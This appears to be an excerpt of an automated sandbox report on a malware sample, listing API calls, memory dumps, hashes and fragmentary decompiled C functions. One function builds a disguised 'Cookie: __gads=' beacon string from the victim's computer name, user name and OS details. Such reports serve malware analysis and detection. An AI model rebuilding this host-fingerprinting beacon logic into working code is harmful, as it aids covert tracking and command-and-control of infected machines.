                                                                                                                                                                                                                                                                0x000d11c2
                                                                                                                                                                                                                                                                0x000d11c2
                                                                                                                                                                                                                                                                0x000d11cc
                                                                                                                                                                                                                                                                0x000d11cc
                                                                                                                                                                                                                                                                0x000d1140
                                                                                                                                                                                                                                                                0x000d1142
                                                                                                                                                                                                                                                                0x000d1144
                                                                                                                                                                                                                                                                0x000d114c
                                                                                                                                                                                                                                                                0x000d1151
                                                                                                                                                                                                                                                                0x000d1154
                                                                                                                                                                                                                                                                0x000d1168
                                                                                                                                                                                                                                                                0x000d1170
                                                                                                                                                                                                                                                                0x000d118d
                                                                                                                                                                                                                                                                0x000d118d
                                                                                                                                                                                                                                                                0x000d1170
                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 000D10FB
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 000D1107
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 000D111A
                                                                                                                                                                                                                                                                  • Part of subcall function 000D13E1: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,00000000,?,?,000D246E,00000000), ref: 000D13FC
                                                                                                                                                                                                                                                                  • Part of subcall function 000D13E1: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 000D1414
                                                                                                                                                                                                                                                                  • Part of subcall function 000D13E1: CloseHandle.KERNEL32(00000000), ref: 000D141D
                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 000D114C
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(KERNEL32.DLL,?), ref: 000D1161
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 000D1168
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AddressCloseCountCreateHandleLibraryLoadPathProcTempTickWritememsetwsprintf
                                                                                                                                                                                                                                                                • String ID: KERNEL32.DLL$~%u.%s
                                                                                                                                                                                                                                                                • API String ID: 3970540841-1793030006
                                                                                                                                                                                                                                                                • Opcode ID: 69d22723148a5e308cc233d300c043f4ca8168699cbd618377e6d4cbcdc6a321
                                                                                                                                                                                                                                                                • Instruction ID: 379bd23c9da3d4590c692a60bc9b2b4385bde34c77b69f784727a6bb1000b1d9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69d22723148a5e308cc233d300c043f4ca8168699cbd618377e6d4cbcdc6a321
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC2195B2605314BBD7609FE4EC88AEB7BACAB48740F00452BFF55D6240EA34D9088770
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                                                			E000D1FE0(void* __edx, intOrPtr _a12) {
                                                                                                                                                                                                                                                                				void* __ecx;
                                                                                                                                                                                                                                                                				WCHAR* _t19;
                                                                                                                                                                                                                                                                				WCHAR* _t35;
                                                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                                                				void* _t42;
                                                                                                                                                                                                                                                                				signed int _t43;
                                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                                				signed int _t45;
                                                                                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                                                                                				signed int _t47;
                                                                                                                                                                                                                                                                				signed int _t48;
                                                                                                                                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                                                				WCHAR* _t55;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t41 = __edx;
                                                                                                                                                                                                                                                                				_t54 =  *0xd3000;
                                                                                                                                                                                                                                                                				_t52 =  *0xd3004;
                                                                                                                                                                                                                                                                				_t19 = HeapAlloc(GetProcessHeap(), 8, 0x2001);
                                                                                                                                                                                                                                                                				_t35 = _t19;
                                                                                                                                                                                                                                                                				_t59 = _t35;
                                                                                                                                                                                                                                                                				if(_t35 != 0) {
                                                                                                                                                                                                                                                                					_t43 = wsprintfW(_t35, L"%s%u", L"Cookie: __gads=", _t52);
                                                                                                                                                                                                                                                                					_t44 = _t43 + wsprintfW( &(_t35[_t43]), L"%s%u", ":", _a12);
                                                                                                                                                                                                                                                                					_t55 = ":";
                                                                                                                                                                                                                                                                					_t45 = _t44 + wsprintfW( &(_t35[_t44]), L"%s%u", _t55, _t54);
                                                                                                                                                                                                                                                                					__imp__GetTickCount64(_t42);
                                                                                                                                                                                                                                                                					_t46 = _t45 + wsprintfW( &(_t35[_t45]), L"%s%u", _t55, E000D2600(_t23, _t41, 0x3e8, 0));
                                                                                                                                                                                                                                                                					_t47 = _t46 + wsprintfW( &(_t35[_t46]), L"%s%u", _t55, E000D1828( &(_t35[_t43])));
                                                                                                                                                                                                                                                                					_t48 = _t47 + E000D1C4A( &(_t35[_t47]));
                                                                                                                                                                                                                                                                					_t49 = _t48 + E000D1D68( &(_t35[_t48]), _t59);
                                                                                                                                                                                                                                                                					E000D1ECF( &(_t35[_t49 + E000D1DD9( &(_t35[_t48 + E000D1D68( &(_t35[_t48]), _t59)]))]));
                                                                                                                                                                                                                                                                					return _t35;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				return _t19;
                                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                                0x000d1fe0
                                                                                                                                                                                                                                                                0x000d1fe3
                                                                                                                                                                                                                                                                0x000d1fea
                                                                                                                                                                                                                                                                0x000d1ffe
                                                                                                                                                                                                                                                                0x000d2004
                                                                                                                                                                                                                                                                0x000d2006
                                                                                                                                                                                                                                                                0x000d2008
                                                                                                                                                                                                                                                                0x000d2027
                                                                                                                                                                                                                                                                0x000d203a
                                                                                                                                                                                                                                                                0x000d203c
                                                                                                                                                                                                                                                                0x000d2050
                                                                                                                                                                                                                                                                0x000d2052
                                                                                                                                                                                                                                                                0x000d2073
                                                                                                                                                                                                                                                                0x000d2087
                                                                                                                                                                                                                                                                0x000d2094
                                                                                                                                                                                                                                                                0x000d209e
                                                                                                                                                                                                                                                                0x000d20ad
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d20b4
                                                                                                                                                                                                                                                                0x000d20b9

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00002001,00000004,?,?,811C9DC5,000D213C,00000000), ref: 000D1FF7
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,811C9DC5,000D213C,00000000), ref: 000D1FFE
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D2021
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D2037
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D204B
                                                                                                                                                                                                                                                                • GetTickCount64.KERNEL32 ref: 000D2052
                                                                                                                                                                                                                                                                • __aulldiv.LIBCMT ref: 000D2061
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D2071
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1828: LoadLibraryA.KERNEL32(NTDLL.DLL,ZwQuerySystemInformation), ref: 000D184A
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1828: GetProcAddress.KERNEL32(00000000), ref: 000D1851
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1828: GetProcessHeap.KERNEL32(00000008,00000000,?), ref: 000D1880
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1828: HeapReAlloc.KERNEL32(00000000), ref: 000D1883
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D2085
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1C4A: memset.MSVCRT ref: 000D1C67
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1C4A: LoadLibraryA.KERNEL32(NTDLL.DLL,RtlGetVersion,7742C0B0,000D45C0,00000000), ref: 000D1C7D
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1C4A: GetProcAddress.KERNEL32(00000000), ref: 000D1C84
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1C4A: wsprintfW.USER32 ref: 000D1CAD
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1C4A: wsprintfW.USER32 ref: 000D1CBD
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1C4A: wsprintfW.USER32 ref: 000D1CFD
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1C4A: LoadLibraryA.KERNEL32(KERNEL32.DLL,GetNativeSystemInfo), ref: 000D1D1B
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1C4A: GetProcAddress.KERNEL32(00000000), ref: 000D1D22
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1C4A: wsprintfW.USER32 ref: 000D1D56
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1D68: wsprintfW.USER32 ref: 000D1D8F
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1D68: wsprintfW.USER32 ref: 000D1DA6
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1D68: wsprintfW.USER32 ref: 000D1DB8
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1D68: wsprintfW.USER32 ref: 000D1DCA
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1DD9: GetComputerNameExA.KERNEL32(00000000,?,00000000,00000000,7742C0B0,000D45C0,00000000), ref: 000D1DFA
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1DD9: GetUserNameA.ADVAPI32(?,?), ref: 000D1E2D
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1DD9: wsprintfW.USER32 ref: 000D1E74
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1DD9: wsprintfW.USER32 ref: 000D1E98
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1ECF: LoadLibraryA.KERNEL32 ref: 000D1EF2
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1ECF: GetProcAddress.KERNEL32(00000000), ref: 000D1EF9
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1ECF: GetProcessHeap.KERNEL32(00000008,00000001), ref: 000D1F24
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1ECF: HeapAlloc.KERNEL32(00000000), ref: 000D1F27
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1ECF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D1F45
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1ECF: HeapFree.KERNEL32(00000000), ref: 000D1F48
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: wsprintf$Heap$AddressLibraryLoadProcProcess$Alloc$Name$ComputerCount64FreeTickUser__aulldivmemset
                                                                                                                                                                                                                                                                • String ID: %s%u$Cookie: __gads=
                                                                                                                                                                                                                                                                • API String ID: 2985715639-3007860590
                                                                                                                                                                                                                                                                • Opcode ID: 8750646e73ea17a18dd846cdb30365f41a0382a1c4a7532b955219e4c17d5392
                                                                                                                                                                                                                                                                • Instruction ID: 2f46cfc4f845030ecf0dc43cb25a9a9022963b74cb35c4146740a112b7106af2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8750646e73ea17a18dd846cdb30365f41a0382a1c4a7532b955219e4c17d5392
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A11A2729413087BEB10ABF0EC89DE63B9EDB55750B050537FA05A7247FF74AA048AB0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00151BE8
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(00000028,00000018,?,00000000,?,0014EF83,?,00000000,?,?,00151B80,?,00000000,00000000), ref: 00151C2E
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000028), ref: 00151C46
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00151C82
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$Select$H_prolog3
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 288218362-0
                                                                                                                                                                                                                                                                • Opcode ID: be7cac7121d8ee80f6f5192ab05e76e753fef888523ac7bb5bffb1c242d8cd87
                                                                                                                                                                                                                                                                • Instruction ID: 63ececd8e06dd756ccfcf34050783e98d719f38424183852eef6a093dde11407
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be7cac7121d8ee80f6f5192ab05e76e753fef888523ac7bb5bffb1c242d8cd87
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7515531810229EFCF16AFE0EC48AEEBB75FF59312F110125F825AA160DB718D55DB60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0014F3BE
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,000000D4,00177515,?), ref: 0014F3FC
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0014F45E
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000054,?), ref: 0014F4A4
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0014F559
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$Select$H_prolog3_
                                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                                • API String ID: 1957664054-3887548279
                                                                                                                                                                                                                                                                • Opcode ID: 8ae921b040155b7d5b35c86e81f49646d8aa745ad92f5b2e121ec0a0e81caa99
                                                                                                                                                                                                                                                                • Instruction ID: 5b173b33128e406ca6288fbd19f3da4267597f0dddd20fc3dbdb2f9809d256cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ae921b040155b7d5b35c86e81f49646d8aa745ad92f5b2e121ec0a0e81caa99
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4A1F574900318DFDB65DF64DC84B9ABBB5BF48310F1081A9E94DE7261DB30AA95CF21
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                                                                			E000D2218(intOrPtr __edx, char* _a4) {
                                                                                                                                                                                                                                                                				int _v4;
                                                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                                                				char* _v12;
                                                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                                                				int _t10;
                                                                                                                                                                                                                                                                				char* _t18;
                                                                                                                                                                                                                                                                				int _t20;
                                                                                                                                                                                                                                                                				char* _t21;
                                                                                                                                                                                                                                                                				char* _t22;
                                                                                                                                                                                                                                                                				char* _t23;
                                                                                                                                                                                                                                                                				char* _t24;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t24 = _t18;
                                                                                                                                                                                                                                                                				_v8 = __edx;
                                                                                                                                                                                                                                                                				_t10 = lstrlenA(_t24);
                                                                                                                                                                                                                                                                				_t22 = _a4;
                                                                                                                                                                                                                                                                				_t20 = _t10;
                                                                                                                                                                                                                                                                				_v4 = _t20;
                                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                                					_t23 = StrStrIA(_t22, _t24);
                                                                                                                                                                                                                                                                					if(_t23 == 0) {
                                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					_t22 = _t23 + _t20;
                                                                                                                                                                                                                                                                					if( *_t22 != 0x2f || _t22[1] != 0x2f) {
                                                                                                                                                                                                                                                                						if(_t22[4] != 0x3a && _t22[5] != 0x3a) {
                                                                                                                                                                                                                                                                							_t21 = StrStrIA(_t22, _v12);
                                                                                                                                                                                                                                                                							if(_t21 == 0) {
                                                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                							 *_t21 = 0;
                                                                                                                                                                                                                                                                							if(StrChrA(_t22, 0x29) == 0) {
                                                                                                                                                                                                                                                                								_push(_t22);
                                                                                                                                                                                                                                                                								if( *_t22 != 0x2f) {
                                                                                                                                                                                                                                                                									_push("/%S");
                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                									_push(0xd4634);
                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                								_t9 =  &_v4; // 0xd4634
                                                                                                                                                                                                                                                                								wsprintfW( *_t9, ??);
                                                                                                                                                                                                                                                                								return 1;
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                							_t22 = _t21;
                                                                                                                                                                                                                                                                							_t8 =  &_v16; // 0xd230d
                                                                                                                                                                                                                                                                							_t20 =  *_t8;
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                                0x000d221d
                                                                                                                                                                                                                                                                0x000d221f
                                                                                                                                                                                                                                                                0x000d2224
                                                                                                                                                                                                                                                                0x000d222a
                                                                                                                                                                                                                                                                0x000d222e
                                                                                                                                                                                                                                                                0x000d2230
                                                                                                                                                                                                                                                                0x000d2234
                                                                                                                                                                                                                                                                0x000d223c
                                                                                                                                                                                                                                                                0x000d2240
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d2242
                                                                                                                                                                                                                                                                0x000d2247
                                                                                                                                                                                                                                                                0x000d2253
                                                                                                                                                                                                                                                                0x000d2266
                                                                                                                                                                                                                                                                0x000d226a
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d226f
                                                                                                                                                                                                                                                                0x000d227a
                                                                                                                                                                                                                                                                0x000d2287
                                                                                                                                                                                                                                                                0x000d2288
                                                                                                                                                                                                                                                                0x000d2291
                                                                                                                                                                                                                                                                0x000d228a
                                                                                                                                                                                                                                                                0x000d228a
                                                                                                                                                                                                                                                                0x000d228a
                                                                                                                                                                                                                                                                0x000d2296
                                                                                                                                                                                                                                                                0x000d229a
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d22a5
                                                                                                                                                                                                                                                                0x000d227c
                                                                                                                                                                                                                                                                0x000d227e
                                                                                                                                                                                                                                                                0x000d227e
                                                                                                                                                                                                                                                                0x000d227e
                                                                                                                                                                                                                                                                0x000d2253
                                                                                                                                                                                                                                                                0x000d2247
                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(url(",?,?,?,url(",url(",000D230D,?,?,?,?,?,?), ref: 000D2224
                                                                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,url(",?,url(",url(",000D230D,?,?,?,?,?,?), ref: 000D2236
                                                                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,?,?,url(",url(",000D230D,?,?,?,?,?,?), ref: 000D2260
                                                                                                                                                                                                                                                                • StrChrA.SHLWAPI(00000000,00000029,?,url(",url(",000D230D,?,?,?,?,?,?), ref: 000D2272
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D229A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: #$/%S$4F$url("
                                                                                                                                                                                                                                                                • API String ID: 357247895-640128190
                                                                                                                                                                                                                                                                • Opcode ID: 7c86b4b23efcd4545d1dfabb327db784e5c9bf4e162dcedc6c4b881877d621fb
                                                                                                                                                                                                                                                                • Instruction ID: 17ab906f204f1c40547af6bda5190974b2ad8305f4cde0de9810feade09b4b0c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c86b4b23efcd4545d1dfabb327db784e5c9bf4e162dcedc6c4b881877d621fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2411C47150A3817FE7754B249808637BFD89FA6360F19456FF8C992351D77898008672
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00119FBF
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00119FF7
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00000001), ref: 0011A006
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(8007000E), ref: 0011A012
                                                                                                                                                                                                                                                                • GetSubMenu.USER32(8007000E,-00000001), ref: 0011A029
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 0011A03C
                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 0011A04D
                                                                                                                                                                                                                                                                • RemoveMenu.USER32(00000000,00000000,00000400,?,?,?,?,?,?,?,00273C90,00000004,00118B49,8007000E,?,00119841), ref: 0011A067
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$CountItem$Exception@8H_prolog3RemoveThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 642076194-0
                                                                                                                                                                                                                                                                • Opcode ID: f519159ea6e5f230a1e8c4262c9a9290476184c79051e7be50992786896edf4a
                                                                                                                                                                                                                                                                • Instruction ID: 4c1100fe8a71a76d82183d5c1b58df83622751d10ae498fe9bcf61194a292e49
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f519159ea6e5f230a1e8c4262c9a9290476184c79051e7be50992786896edf4a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A31AE31901209EBCB29AFB8EC4DAEE3FB8FF85350F504139F419E6151EB709A81CA51
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                                                                                                • String ID: :$f$f$f$p$p$p
                                                                                                                                                                                                                                                                • API String ID: 1302938615-1434680307
                                                                                                                                                                                                                                                                • Opcode ID: 487a94deeba883f30ee9a560e8eae2b4095759e47f25a5de5233edfcfba01657
                                                                                                                                                                                                                                                                • Instruction ID: 54b37cedc1cff51bf5352a023306dfa2631af3d5f6413b34cdb9140cc7eab932
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 487a94deeba883f30ee9a560e8eae2b4095759e47f25a5de5233edfcfba01657
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3702DF75A20118EADF308FA5C4447DDB7BAFB12B16FA44255DC15BB2C4D3744EAC8B18
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlDecodePointer.NTDLL(?), ref: 0025DE81
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DecodePointer
                                                                                                                                                                                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                                                • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                                                • Opcode ID: 68dfef7c9fe783e4a4dca80583daf21c15dbd6e79674feb8039ec280d3ef3e0a
                                                                                                                                                                                                                                                                • Instruction ID: 9afde1dcea31788a9552009531db04c40790c19d6a12402bf2d96c31f0f24542
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68dfef7c9fe783e4a4dca80583daf21c15dbd6e79674feb8039ec280d3ef3e0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B051BE7092054FCBCF249F58E84C1BE7BB0FB45306F014045E991ABA68CBB48A3DDB5A
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ActiveFocus$MessageSend
                                                                                                                                                                                                                                                                • String ID: u
                                                                                                                                                                                                                                                                • API String ID: 1556911595-4067256894
                                                                                                                                                                                                                                                                • Opcode ID: 085c2102dbaaf749bece112f6584d199c3d73e229373d13e16d900a5cb59c255
                                                                                                                                                                                                                                                                • Instruction ID: b96207568b30c9e38cfc717cca08c74807e72aca0f8378e34da4f9cdd1d91eea
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 085c2102dbaaf749bece112f6584d199c3d73e229373d13e16d900a5cb59c255
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75119032901324ABEB276B74FC4C7AA3A65EB5E780B058725F901861A7DB74C8609B54
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00135E85
                                                                                                                                                                                                                                                                  • Part of subcall function 00136518: __EH_prolog3.LIBCMT ref: 0013651F
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00135EAE
